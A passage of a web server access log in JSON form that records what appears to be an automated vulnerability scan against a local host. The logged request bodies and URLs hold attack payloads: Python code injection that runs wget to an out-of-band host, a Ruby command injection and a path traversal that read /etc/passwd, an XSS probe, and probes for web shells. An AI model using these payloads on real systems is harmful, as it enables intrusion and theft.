AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.036","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca285tosmpvbafqg07h0ow1xqkkoat8e3.oast.fun%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/change HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.039","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_shell_cmd.gch HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"username={{username}}&password={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws/v1/cluster/apps/new-application HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pki/images/keyManager_title.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) 